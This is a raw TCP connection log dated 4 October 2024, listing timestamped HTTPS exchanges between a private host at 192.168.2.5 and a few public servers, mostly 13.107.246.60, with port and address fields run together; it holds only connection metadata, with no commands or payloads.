                                                                                Oct 4, 2024 11:34:25.463324070 CEST55703443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.465336084 CEST4435570413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.465426922 CEST4435570413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.465481043 CEST55704443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.475795031 CEST4435570613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.475891113 CEST4435570613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.475950003 CEST55706443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.511141062 CEST55706443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.511179924 CEST4435570613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.511195898 CEST55706443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.511203051 CEST4435570613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.511223078 CEST55702443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.511223078 CEST55702443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.511245012 CEST4435570213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.511255026 CEST4435570213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.519453049 CEST55707443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.519491911 CEST4435570713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.519509077 CEST55707443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.519515991 CEST4435570713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.523658037 CEST55704443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.523662090 CEST55703443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.523662090 CEST55703443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.523677111 CEST4435570413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.523696899 CEST4435570313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.523711920 CEST4435570313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.523713112 CEST55704443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.523719072 CEST4435570413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.535408020 CEST55709443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.535439968 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.535496950 CEST55709443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.536513090 CEST55709443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.536529064 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.542177916 CEST55710443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.542210102 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.542268038 CEST55710443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.546797037 CEST55710443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.546817064 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.549736977 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.549779892 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.549837112 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.550158978 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.550173998 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.551429033 CEST55712443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.551436901 CEST4435571213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.551492929 CEST55712443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.551800013 CEST55712443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.551810980 CEST4435571213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.580688000 CEST55713443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.580737114 CEST4435571313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:25.580792904 CEST55713443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.581327915 CEST55713443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:25.581341982 CEST4435571313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.173336983 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.191785097 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.201778889 CEST55709443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.201802969 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.202222109 CEST55709443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.202227116 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.203102112 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.203115940 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.203507900 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.203512907 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.215939999 CEST4435571213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.216597080 CEST55712443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.216609955 CEST4435571213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.217473984 CEST55712443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.217479944 CEST4435571213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.217813015 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.218739986 CEST55710443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.218763113 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.219427109 CEST55710443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.219434977 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.231570005 CEST4435571313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.235120058 CEST55713443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.235142946 CEST4435571313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.235711098 CEST55713443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.235717058 CEST4435571313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.297177076 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.297313929 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.297365904 CEST55709443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.298145056 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.298228025 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.298280954 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.298305988 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.298324108 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.298382044 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.299161911 CEST55709443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.299184084 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.299196959 CEST55709443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.299205065 CEST4435570913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.303114891 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.303160906 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.303177118 CEST55711443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.303184986 CEST4435571113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.318785906 CEST4435571213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.318866968 CEST4435571213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.318911076 CEST55712443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.319628954 CEST55716443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.319673061 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.319828987 CEST55716443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.319889069 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.319960117 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.320004940 CEST55710443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.320019960 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.320067883 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.320115089 CEST55710443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.322886944 CEST55717443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.322926044 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.322988033 CEST55717443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.323540926 CEST55712443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.323568106 CEST4435571213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.328912973 CEST55716443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.328952074 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.329190016 CEST55710443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.329211950 CEST4435571013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.333122015 CEST55717443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.333139896 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.333276033 CEST4435571313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.333456993 CEST4435571313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.333503008 CEST55713443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.333589077 CEST55713443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.333600044 CEST4435571313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.345937967 CEST55718443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.345952034 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.346004963 CEST55718443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.346246958 CEST55718443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.346257925 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.359426975 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.359484911 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.359559059 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.365920067 CEST55720443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.365977049 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.366039038 CEST55720443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.377042055 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.377068043 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:26.404670000 CEST55720443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:26.404701948 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.259186029 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.259615898 CEST55720443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.259644032 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.260135889 CEST55720443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.260147095 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.262753010 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.262856007 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.264312029 CEST55716443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.264328003 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.265053034 CEST55716443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.265058041 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.265734911 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.266025066 CEST55718443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.266047001 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.266277075 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.266436100 CEST55718443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.266444921 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.268366098 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.268378973 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.269107103 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.269112110 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.269903898 CEST55717443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.269933939 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.270507097 CEST55717443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.270514011 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.363229036 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.363379002 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.363436937 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.363466978 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.363627911 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.363938093 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.363993883 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.364037037 CEST55720443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.364490032 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.364989996 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.365206003 CEST55716443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.365576029 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.365900993 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.365958929 CEST55718443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.366260052 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.366286039 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.366324902 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.366337061 CEST55717443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.366375923 CEST55717443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.383276939 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.383289099 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.383368015 CEST55719443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.383373976 CEST4435571913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.390566111 CEST55717443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.390573025 CEST4435571713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.392271042 CEST55720443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.392290115 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.392302036 CEST55720443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.392308950 CEST4435572013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.393666983 CEST55716443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.393680096 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.393726110 CEST55716443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.393731117 CEST4435571613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.397382975 CEST55718443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.397393942 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.397398949 CEST55718443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.397403002 CEST4435571813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.504014969 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.504111052 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.504200935 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.506127119 CEST55726443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.506136894 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.506206989 CEST55726443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.507054090 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.507116079 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.507226944 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.507849932 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.507863045 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.509392023 CEST55728443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.509419918 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.509676933 CEST55728443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.509823084 CEST55728443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.509835005 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.509934902 CEST55726443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.509944916 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.510081053 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.510109901 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.511641026 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.511672974 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.511780024 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.512207985 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:28.512219906 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:28.736356020 CEST4435570013.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:28.736454964 CEST4435570013.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:28.736531973 CEST55700443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:28.952965021 CEST55700443192.168.2.513.107.253.45
                                                                                Oct 4, 2024 11:34:28.952995062 CEST4435570013.107.253.45192.168.2.5
                                                                                Oct 4, 2024 11:34:29.129144907 CEST4435570113.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:29.129216909 CEST4435570113.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:29.129309893 CEST55701443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:29.138622999 CEST49710443192.168.2.523.1.237.91
                                                                                Oct 4, 2024 11:34:29.138638020 CEST4434971023.1.237.91192.168.2.5
                                                                                Oct 4, 2024 11:34:29.157113075 CEST55701443192.168.2.513.107.246.44
                                                                                Oct 4, 2024 11:34:29.157126904 CEST4435570113.107.246.44192.168.2.5
                                                                                Oct 4, 2024 11:34:29.316451073 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.316888094 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.318310976 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.319701910 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.324976921 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.365751028 CEST55728443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.365792036 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.366286993 CEST55728443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.366292953 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.366781950 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.366802931 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.367168903 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.367173910 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.374052048 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.374080896 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.374547958 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.374553919 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.374921083 CEST55726443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.374944925 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.375313997 CEST55726443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.375322104 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.376442909 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.376458883 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.377271891 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.377280951 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.465368032 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.465507984 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.465564013 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.465579987 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.465615034 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.465658903 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.465806961 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.465820074 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.465831995 CEST55729443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.465837955 CEST4435572913.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.470065117 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.470155001 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.470205069 CEST55728443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.470243931 CEST55740443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.470273018 CEST4435574013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.470341921 CEST55740443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.470388889 CEST55728443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.470412016 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.470424891 CEST55728443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.470433950 CEST4435572813.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.470480919 CEST55740443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.470491886 CEST4435574013.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.472770929 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.472836971 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.472893953 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.472907066 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.472948074 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.473002911 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.473067045 CEST55741443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.473098040 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.473103046 CEST4435574113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.473114014 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.473124027 CEST55727443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.473128080 CEST4435572713.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.473171949 CEST55741443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.473373890 CEST55741443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.473390102 CEST4435574113.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475140095 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475176096 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475217104 CEST55742443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475229025 CEST4435574213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475260973 CEST55726443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475275040 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475313902 CEST55742443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475425959 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475446939 CEST55726443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475449085 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475452900 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475464106 CEST55726443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475486040 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475493908 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475578070 CEST55742443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475589991 CEST4435574213.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475713968 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475723982 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475733042 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.475878954 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475910902 CEST4435572513.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.475950956 CEST55725443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.476090908 CEST4435572613.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.477705956 CEST55743443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.477718115 CEST4435574313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.477788925 CEST55743443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.477897882 CEST55743443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.477907896 CEST4435574313.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.478085995 CEST55744443192.168.2.513.107.246.60
                                                                                Oct 4, 2024 11:34:29.478116035 CEST4435574413.107.246.60192.168.2.5
                                                                                Oct 4, 2024 11:34:29.478178978 CEST55744443192.168.2.513.107.246.60
